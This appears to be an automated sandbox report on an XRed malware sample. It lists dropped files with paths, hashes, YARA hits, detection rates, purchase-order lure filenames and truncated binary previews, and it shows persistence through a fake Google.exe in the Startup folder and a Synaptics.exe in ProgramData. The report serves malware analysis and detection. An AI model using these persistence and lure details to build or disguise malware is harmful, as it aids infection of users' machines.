                                                                                                                                                                                  MD5:FC9ACB5D2652CFE7F7A52E2B7513732D
                                                                                                                                                                                  SHA1:9B837C6002751C83576CAE90A5A69F95858906D6
                                                                                                                                                                                  SHA-256:A7A9A8BBB17B9DF40260C5F3E28A863AA6B19FF97CF1ED362370A0376B90A488
                                                                                                                                                                                  SHA-512:3AC894C81AA56B8CD25A757BD3AAA9C0FF4DBF84C08BC9DA545590B740F5021CD4B2B45F299B81C9DD922B329952EA6A401829C6CA3F17BCCB580ADC10A8DF8A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.2.4.<./.P.i.

                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER963E.tmp.xml

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4572
                                                                                                                                                                                  Entropy (8bit):4.442730123913199
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:cvIwWl8zssJg77aI9CtWpW8VY8Ym8M4JFetFx+q84iRc5ZFd:uIjfqI7Mc7VIJQQmZFd
                                                                                                                                                                                  MD5:1DCFC8593EDE7B59B7F9255F9A69FBB1
                                                                                                                                                                                  SHA1:D8A9D1BC1C44F8B1D06A216AB02D529CB0A994A9
                                                                                                                                                                                  SHA-256:49CC5F5E41CC8A466A9F8B77B79D9A427050F2B5736695CA584B6474ABB9CF27
                                                                                                                                                                                  SHA-512:21C5D49580C89405E9FDA0CF500D726953A27CEF642C5CF19FCBD1676257CCCD492AB975764AFAAED8CD662B0AE139343BF4104B51F63B5571D6735D513BE14D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653875" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                  C:\ProgramData\Synaptics\RCX915F.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):771584
                                                                                                                                                                                  Entropy (8bit):6.638013190381294
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                                                                  MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                                  SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                                                                  SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                                                                  SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX915F.tmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX915F.tmp, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                  • Filename: Open Purchase Order Summary Sheet.vbs, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: valyzt.msi, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: New PO - Supplier 16-12-2024-Pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Purchase-Order.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: hoaiuy.msi, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: 222.msi, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Machine-PO.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: 222.exe, Detection: malicious, Browse
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  C:\ProgramData\Synaptics\RCXC360.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):771584
                                                                                                                                                                                  Entropy (8bit):6.638013190381294
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                                                                  MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                                  SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                                                                  SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                                                                  SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXC360.tmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXC360.tmp, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                  • Filename: Open Purchase Order Summary Sheet.vbs, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: valyzt.msi, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: New PO - Supplier 16-12-2024-Pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Purchase-Order.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: hoaiuy.msi, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: 222.msi, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Machine-PO.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: 222.exe, Detection: malicious, Browse
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2203648
                                                                                                                                                                                  Entropy (8bit):7.056405744702409
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:ZnsHyjtk2MYC5GDqkwkn9IMHea2A07SXq6zMaPCSO:Znsmtk2acdnV+FSvPCt
                                                                                                                                                                                  MD5:38D3095D1B748CD53C65395718D7C5F4
                                                                                                                                                                                  SHA1:3C0221471B641A641A9141A731F6EE09663E6538
                                                                                                                                                                                  SHA-256:F3724BF49BFD8D11EF1F81B4C6AEBC4D3281CECFA357D4FB3AE388A4ADD242E6
                                                                                                                                                                                  SHA-512:F0AB6ED5DFA52D8159C5090FD96087BA8E89C26C2FDB90FAE3F4D19B6952250ECD49846B9198D7C77AFFB6FABE3A0E53758392409A73552B202591433AFC03E6
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2203648
                                                                                                                                                                                  Entropy (8bit):7.056405744702409
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:ZnsHyjtk2MYC5GDqkwkn9IMHea2A07SXq6zMaPCSO:Znsmtk2acdnV+FSvPCt
                                                                                                                                                                                  MD5:38D3095D1B748CD53C65395718D7C5F4
                                                                                                                                                                                  SHA1:3C0221471B641A641A9141A731F6EE09663E6538
                                                                                                                                                                                  SHA-256:F3724BF49BFD8D11EF1F81B4C6AEBC4D3281CECFA357D4FB3AE388A4ADD242E6
                                                                                                                                                                                  SHA-512:F0AB6ED5DFA52D8159C5090FD96087BA8E89C26C2FDB90FAE3F4D19B6952250ECD49846B9198D7C77AFFB6FABE3A0E53758392409A73552B202591433AFC03E6
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exe, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exe, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\._cache_Google.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1432064
                                                                                                                                                                                  Entropy (8bit):7.20532961543164
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:Z4lavt0LkLL9IMixoEgea2A08ob7xV6+SXq8iMPRNhJNcbq9MmCS:okwkn9IMHea2A07SXq6zMaPCS
                                                                                                                                                                                  MD5:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                                                                                  SHA1:4430A5461B9C0B5FB8AD0398EDAD7B5E89159441
                                                                                                                                                                                  SHA-256:90520E67BFFE18505E7D77356A0ADBF8AB6663862EF765387EEAF6E2CE5A32D6
                                                                                                                                                                                  SHA-512:4F953EAD572C92BDE737227C1AFA88BC2D274118E42C99E9245405B4748FA0F258CA8B334ECF219E5C7D2ADBBF9185CA4CBBDCC5EF312C26AA7E81BD32D0610C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....._g.........."..................k............@..........................@......%.....@...@.......@.....................lk..|....@..TE...................... l..................................p'..@...............X............................text...t........................... ..`.rdata..j...........................@..@.data...4........b..................@....rsrc...TE...@...F..................@..@.reloc..b............4..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1EHNQJq.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.241109698744005
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0yh+gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+dh+g+pAZewRDK4mW
                                                                                                                                                                                  MD5:AE6DB8D504B13267FF691C50FC1E97A7
                                                                                                                                                                                  SHA1:232A5379DF948CA5319ACD09F62A101FD500BFA4
                                                                                                                                                                                  SHA-256:60F54C4CF5F616032D5F26D7D0C3A4D233C84D73789D474897407CC3FE0D635D
                                                                                                                                                                                  SHA-512:B2573399DF6214709038C05CAC5B5BE9F03C582EBCA7F212C6DC3EE4C2DCD21903D36EDE7242F4EE813E5ABF24829A4F2D013CAA29C275733489DE18FFFB4420
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Pgmlunzp37kxn2pFLm1Brg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1cMBRR8.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.262910080879703
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G+pAZewRDK4mW
                                                                                                                                                                                  MD5:688B50F1CCE1E8F3B72E0F41C24807BB
                                                                                                                                                                                  SHA1:39DB9985D3961BB897C4064D592B1E29B424EADB
                                                                                                                                                                                  SHA-256:BFFA2BFE422D9E74B9DC699B78DAC52B8D25259E78787D7370B6F3FF8D60C6B8
                                                                                                                                                                                  SHA-512:F50E95A0320C9C6F914079AA14BAEB4090DF2E07FB5AF521F4B59435EC83BB31FDE2174F773D6E15DDE90CA772EED4F5CE67E7EEB1170BDA09F0FC5D31CA5B07
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HWapkPpMgfD3lM0KmuGZrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\2VWg8KD.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.267805412063656
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0wQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ZQ+pAZewRDK4mW
                                                                                                                                                                                  MD5:3A24F2B44A9F70E43484DB75867C940C
                                                                                                                                                                                  SHA1:4643FE8D3398FE17E7FF3A29BE85FC52F9526125
                                                                                                                                                                                  SHA-256:36536A384237723A60A28580DC8935777F1D8D33D3400628F64FC319F7CF1555
                                                                                                                                                                                  SHA-512:35E41123FC6894D92007182C0D00F9AF6A5212E804F6F11E5CC18A4BA45DF444489E99050A46B7361C97C94F616E7508E72846172E5B29A1053FE90A1B2A6134
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2yzNe4Pkg9Ii3j2MVP_V_A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\2iL45kbL.xlsm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:Microsoft Excel 2007+
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):18387
                                                                                                                                                                                  Entropy (8bit):7.523057953697544
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                                  MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                                  SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                                  SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                                  SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\2yEc37i.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.266077282848435
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0gJzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Tz+pAZewRDK4mW
                                                                                                                                                                                  MD5:E40F18F14DB220945F71A8C8364FDC71
                                                                                                                                                                                  SHA1:DC44D60B27CD939CBBCD70C686BF652C7EC8F3B1
                                                                                                                                                                                  SHA-256:A8A8ADDDF32F7782E1C06969A809EBECACD856AC8738127BA4836E516883304D
                                                                                                                                                                                  SHA-512:4E77A79D6A6A19B9B5DFC2559AB14223049128E57A8A3EA36128CC6E1C89C2ECF8BA258D312913E69F706EB70F9F1FD260BBCC467949D552ACCAAA9824134F6D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hSMOW018qO7ElM_D_agZZg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\6Zy34sd.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.263691310721364
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+02hybSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Xhw+pAZewRDK4mW
                                                                                                                                                                                  MD5:0BCE33B27ACEB2A649D16B943DD86468
                                                                                                                                                                                  SHA1:C8AEB31F8CAB26D64F65F8955B4E35BA650E20DD
                                                                                                                                                                                  SHA-256:5C64DE8A18C2BE954CF5759B3E167631B87DF4097A08F8DB094E09F5839EB4F6
                                                                                                                                                                                  SHA-512:812301667330214458814B07F3F0E00BCCB8BA0DD0CB0C6212AAA56E5D7F21AA60E5818D41728830438E91C8BE9A48514D76072193D7DA0D1865D7F7BB0A0868
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YfsSIRyFUlwK8ngbFv3GdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\8HdNQui.ini

                                                                                                                                                                                  Download File
